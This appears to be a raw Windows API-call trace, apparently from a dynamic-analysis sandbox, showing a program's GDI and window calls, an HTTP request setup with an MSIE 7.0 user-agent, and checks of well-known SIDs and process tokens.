[0160.558] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.558] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.558] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.558] GetSystemMetrics (nIndex=6) returned 1
[0160.558] GetDC (hWnd=0x0) returned 0x480107e1
[0160.559] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.559] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.559] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.559] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.559] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.559] GetSystemMetrics (nIndex=6) returned 1
[0160.559] GetDC (hWnd=0x0) returned 0x480107e1
[0160.559] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.559] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.559] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.559] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.559] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.559] GetSystemMetrics (nIndex=6) returned 1
[0160.560] GetDC (hWnd=0x0) returned 0x480107e1
[0160.560] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.560] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.560] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.560] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.560] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.560] GetSystemMetrics (nIndex=6) returned 1
[0160.560] GetDC (hWnd=0x0) returned 0x480107e1
[0160.560] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.560] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.560] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.560] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.560] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.560] GetSystemMetrics (nIndex=6) returned 1
[0160.561] GetDC (hWnd=0x0) returned 0x480107e1
[0160.561] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.561] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.561] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.561] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.561] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.561] GetSystemMetrics (nIndex=6) returned 1
[0160.561] GetDC (hWnd=0x0) returned 0x480107e1
[0160.561] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.561] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.561] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.561] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.561] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.561] GetSystemMetrics (nIndex=6) returned 1
[0160.561] GetDC (hWnd=0x0) returned 0x480107e1
[0160.561] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.562] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.562] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.562] GetSystemMetrics (nIndex=6) returned 1
[0160.562] GetDC (hWnd=0x0) returned 0x480107e1
[0160.562] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.562] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.562] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.562] GetSystemMetrics (nIndex=6) returned 1
[0160.562] GetDC (hWnd=0x0) returned 0x480107e1
[0160.562] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.562] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.562] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.562] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.563] GetSystemMetrics (nIndex=6) returned 1
[0160.563] GetDC (hWnd=0x0) returned 0x480107e1
[0160.563] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.563] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.563] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.563] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.563] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.563] GetSystemMetrics (nIndex=6) returned 1
[0160.563] GetDC (hWnd=0x0) returned 0x480107e1
[0160.563] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.563] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.563] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.563] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.563] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.563] GetSystemMetrics (nIndex=6) returned 1
[0160.566] SysReAllocStringLen (in: pbstr=0x2a1f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a1f388*="GET") returned 1
[0160.566] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.566] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.566] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.566] SysReAllocStringLen (in: pbstr=0x2a1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a1f388*="GET") returned 1
[0160.567] SysReAllocStringLen (in: pbstr=0x2a1f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a1f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0160.567] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x14f198, lpdwBufferLength=0x14f19c | out: lpBuffer=0x14f198, lpdwBufferLength=0x14f19c) returned 1
[0160.617] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x14f198, dwBufferLength=0x4) returned 1
[0160.618] VirtualFree (lpAddress=0x2a20000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0160.618] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a16490, cbMultiByte=3, lpWideCharStr=0x14e0d0, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0160.618] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.618] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.618] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.618] SysReAllocStringLen (in: pbstr=0x2a1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a1f388*="GET") returned 1
[0160.618] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.619] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.619] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.619] SysReAllocStringLen (in: pbstr=0x2a1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a1f388*="GET") returned 1
[0160.625] GetTextExtentPoint32A (in: hdc=0x480107e1, lpString="0", c=1, psizl=0x14f28c | out: psizl=0x14f28c) returned 1
[0160.625] IsIconic (hWnd=0xe01a8) returned 0
[0160.625] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f28c | out: lpRect=0x14f28c) returned 1
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] IsIconic (hWnd=0xe01a8) returned 0
[0160.625] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1d4 | out: lpRect=0x14f1d4) returned 1
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] IsIconic (hWnd=0xe01a8) returned 0
[0160.625] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.625] IsIconic (hWnd=0xe01a8) returned 0
[0160.626] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.626] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0160.626] GetSysColor (nIndex=20) returned 0xffffff
[0160.626] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0160.626] FlatSB_SetScrollInfo (param_1=0xe01a8, code=0, psi=0x14f1e2, fRedraw=1) returned 0
[0160.626] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.626] IsIconic (hWnd=0xe01a8) returned 0
[0160.626] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.626] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.626] IsIconic (hWnd=0xe01a8) returned 0
[0160.626] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.626] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] IsIconic (hWnd=0xe01a8) returned 0
[0160.627] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.627] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0160.627] GetSysColor (nIndex=20) returned 0xffffff
[0160.627] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0160.627] FlatSB_SetScrollInfo (param_1=0xe01a8, code=1, psi=0x14f1e2, fRedraw=1) returned 0
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] IsIconic (hWnd=0xe01a8) returned 0
[0160.627] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] IsIconic (hWnd=0xe01a8) returned 0
[0160.627] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1d4 | out: lpRect=0x14f1d4) returned 1
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] IsIconic (hWnd=0xe01a8) returned 0
[0160.627] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.627] IsIconic (hWnd=0xe01a8) returned 0
[0160.627] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.627] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0160.627] GetSysColor (nIndex=20) returned 0xffffff
[0160.627] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0160.627] FlatSB_SetScrollInfo (param_1=0xe01a8, code=0, psi=0x14f1e2, fRedraw=1) returned 0
[0160.628] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.628] IsIconic (hWnd=0xe01a8) returned 0
[0160.628] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.628] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.628] IsIconic (hWnd=0xe01a8) returned 0
[0160.628] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.628] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.628] IsIconic (hWnd=0xe01a8) returned 0
[0160.628] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.628] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0160.628] GetSysColor (nIndex=20) returned 0xffffff
[0160.628] FlatSB_SetScrollProp (param_1=0xe01a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0160.628] FlatSB_SetScrollInfo (param_1=0xe01a8, code=1, psi=0x14f1e2, fRedraw=1) returned 0
[0160.628] GetWindowLongA (hWnd=0xe01a8, nIndex=-16) returned 116326400
[0160.628] IsIconic (hWnd=0xe01a8) returned 0
[0160.628] GetClientRect (in: hWnd=0xe01a8, lpRect=0x14f1a4 | out: lpRect=0x14f1a4) returned 1
[0160.628] GetCurrentThreadId () returned 0x6f8
[0160.629] ConvertSidToStringSidA () returned 0x1
[0160.629] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.629] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0160.629] LocalFree (hMem=0x696f40) returned 0x0
[0160.629] LocalFree (hMem=0x682f90) returned 0x0
[0160.629] ConvertStringSidToSidA () returned 0x1
[0160.629] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a12914, pSourceSid=0x682f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a12914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.629] IsValidSid (pSid=0x2a12914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.629] ConvertSidToStringSidA () returned 0x1
[0160.629] LocalFree (hMem=0x696f40) returned 0x0
[0160.629] LocalFree (hMem=0x682f90) returned 0x0
[0160.630] ConvertStringSidToSidA () returned 0x1
[0160.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1702c, pSourceSid=0x682f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a1702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.630] IsValidSid (pSid=0x2a1702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.630] ConvertSidToStringSidA () returned 0x1
[0160.630] LocalFree (hMem=0x696f40) returned 0x0
[0160.630] LocalFree (hMem=0x682f90) returned 0x0
[0160.630] ConvertStringSidToSidA () returned 0x1
[0160.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f5a0, pSourceSid=0x682f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a1f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.630] IsValidSid (pSid=0x2a1f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.630] ConvertSidToStringSidA () returned 0x1
[0160.630] LocalFree (hMem=0x696f40) returned 0x0
[0160.630] LocalFree (hMem=0x682f90) returned 0x0
[0160.630] ConvertStringSidToSidA () returned 0x1
[0160.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f614, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.630] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.630] ConvertSidToStringSidA () returned 0x1
[0160.630] LocalFree (hMem=0x696f58) returned 0x0
[0160.630] LocalFree (hMem=0x696f40) returned 0x0
[0160.630] ConvertStringSidToSidA () returned 0x1
[0160.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f688, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a1f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0160.630] IsValidSid (pSid=0x2a1f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0160.630] ConvertSidToStringSidA () returned 0x1
[0160.630] LocalFree (hMem=0x696f58) returned 0x0
[0160.630] LocalFree (hMem=0x696f40) returned 0x0
[0160.630] ConvertStringSidToSidA () returned 0x1
[0160.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f6fc, pSourceSid=0x696f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a1f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0160.630] IsValidSid (pSid=0x2a1f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0160.631] ConvertSidToStringSidA () returned 0x1
[0160.631] LocalFree (hMem=0x68c1c8) returned 0x0
[0160.631] LocalFree (hMem=0x696f58) returned 0x0
[0160.631] ConvertStringSidToSidA () returned 0x1
[0160.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f770, pSourceSid=0x696f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a1f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0160.631] IsValidSid (pSid=0x2a1f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0160.631] ConvertSidToStringSidA () returned 0x1
[0160.631] LocalFree (hMem=0x68c1c8) returned 0x0
[0160.631] LocalFree (hMem=0x696f70) returned 0x0
[0160.631] ConvertStringSidToSidA () returned 0x1
[0160.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f7f8, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a1f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0160.631] IsValidSid (pSid=0x2a1f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0160.631] ConvertSidToStringSidA () returned 0x1
[0160.631] LocalFree (hMem=0x68c1c8) returned 0x0
[0160.631] LocalFree (hMem=0x696f40) returned 0x0
[0160.631] ConvertStringSidToSidA () returned 0x1
[0160.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f880, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a1f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0160.631] IsValidSid (pSid=0x2a1f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0160.631] ConvertSidToStringSidA () returned 0x1
[0160.631] LocalFree (hMem=0x696f58) returned 0x0
[0160.631] LocalFree (hMem=0x696f40) returned 0x0
[0160.631] ConvertStringSidToSidA () returned 0x1
[0160.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f90c, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a1f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0160.631] IsValidSid (pSid=0x2a1f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0160.631] ConvertSidToStringSidA () returned 0x1
[0160.631] LocalFree (hMem=0x696f58) returned 0x0
[0160.631] LocalFree (hMem=0x696f40) returned 0x0
[0160.631] ConvertStringSidToSidA () returned 0x1
[0160.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1f998, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a1f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0160.631] IsValidSid (pSid=0x2a1f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0160.632] ConvertSidToStringSidA () returned 0x1
[0160.632] LocalFree (hMem=0x696f58) returned 0x0
[0160.632] LocalFree (hMem=0x696f40) returned 0x0
[0160.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.632] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0160.632] GetCurrentThread () returned 0xfffffffe
[0160.632] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.632] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0160.632] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x14ea64 | out: TokenHandle=0x14ea64*=0x28f3756) returned 0
[0160.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.633] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0160.633] GetCurrentProcess () returned 0xffffffff
[0160.633] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.633] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0160.633] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a1fa3c | out: TokenHandle=0x2a1fa3c*=0x1d0) returned 1
[0160.633] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.633] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0160.633] MapGenericMask (in: AccessMask=0x14e8dc, GenericMapping=0x14e8e0 | out: AccessMask=0x14e8dc)
[0160.633] MapGenericMask (in: AccessMask=0x14ea10, GenericMapping=0x14ea14 | out: AccessMask=0x14ea10)
[0160.634] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.634] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0160.634] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14ea24 | out: TokenInformation=0x0, ReturnLength=0x14ea24) returned 0
[0160.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.634] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0160.634] GetLastError () returned 0x7a
[0160.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.634] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
